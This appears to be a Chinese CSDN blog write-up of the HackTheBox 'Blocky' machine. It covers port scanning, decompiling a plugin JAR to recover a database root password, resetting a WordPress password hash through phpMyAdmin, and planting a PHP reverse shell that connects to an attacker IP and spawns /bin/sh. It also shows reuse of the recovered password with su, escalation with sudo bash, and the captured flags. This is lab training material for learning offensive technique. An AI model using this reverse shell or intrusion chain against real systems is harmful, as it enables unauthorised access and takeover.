[Meachines] [Easy] Blocky Jar包反编译

最新推荐文章于 2024-07-29 18:00:00 发布
最新推荐文章于 2024-07-29 18:00:00 发布
阅读量166 收藏 1
点赞数 7
分类专栏: HackTheBox 文章标签: jar java
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/140750992
版权

信息收集

IP AddressOpening Ports
10.10.10.37TCP:21,22,80,25565

$ nmap -p- 10.10.10.37 --min-rate 1000 -sC -sV

PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://blocky.htb
|_http-server-header: Apache/2.4.18 (Ubuntu)
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)

HTTPD

image.png

# echo '10.10.10.37 blocky.htb'>>/etc/hosts

$ wpscan --url http://blocky.htb/ --enumerate u

username:notch

$ dirb http://blocky.htb

image-1.png

http://blocky.htb/plugins/

image-2.png

http://blocky.htb/phpmyadmin/

image-3.png

Jar包反编译

$ wget http://blocky.htb/plugins/files/BlockyCore.jar

$ binwalk BlockyCore.jar

image-4.png

$ foremost BlockyCore.jar

$ cd ./output/zip

$ unzip 00000000.zip

$ cd ./com/myfirstplugin

$ javap -c BlockyCore.class

image-5.png

username:root password:8YsqfCTnvxAUeduzjNSXe22

www-data 权限

phpAdmin登录,更新notch密码

image-7.png

https://www.useotools.com/ru/wordpress-password-hash-generator

$P$BNG7MVQRrgfTW4aREpCCA7Bv80pHmf/

image-8.png

$ip = '10.10.16.6';
$port = 10032;
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);

image-9.png

$ curl http://blocky.htb/

image-10.png

$ su notch

Password: 8YsqfCTnvxAUeduzjNSXe22

image-11.png

User.txt

23da8f7548a2c1df972caa7fc6ca3b9d

权限提升

$ sudo -l

$ sudo /bin/bash

image-12.png

Root.txt

8e66e7402571816ee90419d1a6eca642

Мартин.
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
blocky:简单的html5游戏
06-12
压缩包文件"blocky-master"可能包含了游戏的所有源代码、资源文件(如图片、音频)以及可能的构建和部署工具。通过查看和分析这些文件,开发者可以深入学习HTML5游戏开发的实践技巧,包括如何组织项目结构、如何编写...
Blocky-os:新的Blocky os
02-04
同时,JVM的动态编译优化技术(如JIT编译器)也能提高Blocky-os的运行效率。 操作系统的核心组件,如进程管理、内存管理、文件系统和设备驱动,都在Java中进行了实现。这使得Blocky-os能够利用Java语言的高级特性,...
blocky-boss-battle-hard
04-02
僵硬的老板战斗困难 使用此扩展名 该存储库可以作为扩展添加到MakeCode中。 打开 ...搜索此存储库的URL并导入 编辑此扩展 要在MakeCode中编辑此存储库。...用于PXT /拱廊(包搜索需要上面的元数据。)
blocky-calendar
05-29
Blocky-Calendar 是一个基于React开发的块状日历应用,它融合了日历、提醒以及项目管理功能,为用户提供了一站式的任务管理和时间规划工具。这个应用利用了React的组件化思想,使得代码结构清晰,易于维护和扩展。...
idea启动项目报:the command line via JAR manifest or via a classpath file and rerun.
绅士jiejie的博客
07-25 268
the command line via JAR manifest or via a classpath file and rerun.
使用hutool工具判断字符串是否全部是字母(包括大小写),java判断字符串是否全部是字母(包括大小写)
qq_43700885的博客
07-29 248
1.导入hutool的maven依赖。2.复制一下代码执行。
golang 接口
m0_70982551的博客
07-24 994
接口定义了一组方法,这些方法没有具体的实现。接口类型的变量可以存储任何实现了这些方法的类型的值。// 更多方法...在Go语言中,接口值是指存储了实现某个接口的具体类型值的变量。接口值由两部分组成:1.动态类型:这是接口值当前存储的实际类型。2.动态值:这是实际存储的值,该值必须实现了接口中定义的所有方法。
java判断邮箱地址是否正确,使用hutool工具判断邮箱地址是否正确
qq_43700885的博客
07-29 95
1.导入hutool的maven依赖。2.直接复制一下代码运行。
Swagger使用Map接受参数时,页面如何显示具体参数及说
a1058926697的博客
07-26 532
后端使用Map接受参数,要求在swagger页面上显示具体的参数名称、类型及说明。当Map接受参数数量少时,可以使用Swagger自带的注解。自定义注解 @ApiGlobalModel。编写处理注解对应的插件。
26.jdk源码阅读之ConcurrentLinkedQueue
最新发布
前端、移动端、后端源码级底层原理分享
07-29 580
ConcurrentLinkedQueue 是 Java 中提供的一个基于无界非阻塞算法的线程安全队列。它是一个适用于高并发环境的队列实现,基于链表结构。
Java的@DateTimeFormat注解与@JsonFormat注解的使用对比
訾博(ZiBo)的博客
07-27 605
在Spring和Jackson框架中,日期和时间格式化是一个常见需求。注解主要用于Spring的表单绑定,而注解则用于Jackson的JSON序列化和反序列化。了解这两个注解的使用场景和方法,可以帮助开发者更高效地处理日期和时间。和是处理日期和时间格式化的两个重要注解。主要用于Spring MVC的请求参数绑定,而主要用于Jackson的JSON序列化和反序列化。了解它们的使用场景和功能,可以帮助开发者更高效地处理日期和时间格式化需求。通过本文的介绍,希望读者能够更清晰地理解和。
Java代码基础算法练习-数的特性-2024.07.25
Sakurapaid的博客
07-25 382
小A喜欢两种性质都成立的数字,小B喜欢至少符合一种性质的数字,小C喜欢不符合这两种性质的 数字。给出一个数字,请输出三个人是否喜欢这个数字。如果喜欢输出1,否则输出0,用空格分隔。输入数字 num,先定义三个整型代表三个人的喜欢与否,先默认设为 0。之后判断num对于性质1、2的条件,分别用 boolen 类型标识。对于每个整型进行判断,是否改为 1 代表喜欢。性质2:大于4且不大于12;
Java修炼 2024.7.26 0:24
2301_80011650的博客
07-26 438
问题:编写一个方法,找出一个数组中的众数(出现次数超过数组长度一半的元素)。例如,输入 [2, 2, 1, 1, 2],输出 2。编写一个方法,找出一个整数数组中的第二大元素。例如,输入 [3, 5, 1, 8, 7],输出 7。例如,输入 5,输出 5。问题:编写一个方法,将给定的字符串逆转。问题:使用数组实现栈,并提供基本操作(push、pop、peek、isEmpty)。问题:实现一个单向链表,并提供基本的操作(添加、删除、查找元素)。问题:编写一个方法来查找一个给定字符串的所有子串。
新建springboot项目找不到java版本8?
weixin_74009895的博客
07-28 132
新建springboot项目找不到java版本8?
高级java每日一道面试题-2024年7月29日-并发篇-什么时候用乐观锁,什么时候用悲观锁?
qq_43071699的博客
07-29 333
悲观锁适用于数据竞争激烈的场景,能够提供强一致性,但可能导致较多的线程等待。乐观锁适用于读多写少的场景,能够提供更高的并发性能,但可能需要多次尝试才能成功更新数据。
SSM框架整合——常用方式整合SSM框架(三)Spring和MyBatis整合
PAP
07-26 197
SSM框架整合——常用方式整合SSM框架(三)Spring和MyBatis整合
c++ 智能指针shared_ptr与make_shared
Txwtech笛克特科
07-25 283
shared_ptr是C++11引入的一种智能指针,‌它允许多个shared_ptr实例共享同一个对象,‌通过引用计数来管理对象的生命周期。‌当最后一个持有对象的shared_ptr被销毁时,‌它会自动删除所指向的对象。‌这种智能指针主要用于解决资源管理问题,‌避免内存泄漏。make_shared是C++标准库中的一个函数,‌用于创建一个shared_ptr智能指针,‌它接受一个或多个参数来构造一个对象,‌并返回一个指向该对象的shared_ptr。类SerialModbus的成员指针。
Java —— 线程
JL_L666的博客
07-26 667
程序(program):为完成特定的任务,选用某一种语言编写的,即指,静态对象。进程(process):程序的一次执行过程,或是。程序是静态的、进程是。进程是调度和分配资源的最小单位。注意:不同的进程之间是不共享内存的、进程之间的数据交换和通信的成本很高。线程(thread):进程可以进一步细化为线程,是运行中进程的一条或多条执行路径。线程调度策略单核CPU与多核CPU并行与并发上。
function check_right(){ //右 var blockX=mouseX+1; //定义blockX var blockY=mouseY; //定义blockY if(blackarray[blockY][blockX]==2 && blockX<7 && blackarray[blockY][blockX+1]!=0 && blackarray[blockY][blockX+1]!=2){ //判断是否碰壁 var blockname=blockY*10+blockX; //定义blockname var oDivblockcatch=document.getElementById(blockname); //获取blockname blackarray[blockY][blockX]=1; // blockX+=1; blackarray[blockY][blockX]=2; oDivblockcatch.id=blockY*10+blockX; oDivblockcatch.style.left=100+22*blockX; } return true; }
06-11
这段代码看起来是 JavaScript 语言写的一个函数,函数名为 check_right。根据代码注释中的提示,这个函数是用来判断方块是否可以向右移动并移动方块的操作。下面是对代码的解释: - 第1行是注释,解释了这个函数的作用。 - 第2行定义了一个变量 blockX,其值为 mouseX+1,其中 mouseX 可能是鼠标的 X 坐标。 - 第3行定义了一个变量 blockY,其值为 mouseY,其中 mouseY 可能是鼠标的 Y 坐标。 - 第4行是一个 if 条件判断语句,判断当前方块是否可以向右移动。如果黑色方块数组 blackarray 中的第 blockY 行第 blockX 列的值为 2,且 blockX 小于 7,且 blackarray 中第 blockY 行第 blockX+1 列的值不为 0 或 2,则表示方块可以向右移动。 - 第5行定义了一个变量 blockname,其值为 blockY*10+blockX,这个值可能是用来标识方块的。 - 第6行使用 getElementById 方法获取 id 为 blockname 的元素,可能是获取当前方块的元素。 - 第7行将 blackarray 中第 blockY 行第 blockX 列的值设为 1,表示原来位置的方块已经离开。 - 第8行将 blockX 的值加 1,表示将方块向右移动一格。 - 第9行将 blackarray 中第 blockY 行第 blockX 列的值设为 2,表示新位置上出现了方块。 - 第10行将 oDivblockcatch 的 id 改为 blockY*10+blockX,可能是更新方块的标识。 - 第11行将 oDivblockcatch 的 left 属性设为 100+22*blockX,可能是改变方块的位置。 - 第12行返回 true,表示函数执行成功。 需要注意的是,这段代码缺少上下文信息,无法确定变量 mouseX、mouseY 和 blackarray 的值,也无法确定 oDivblockcatch 的实际效果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值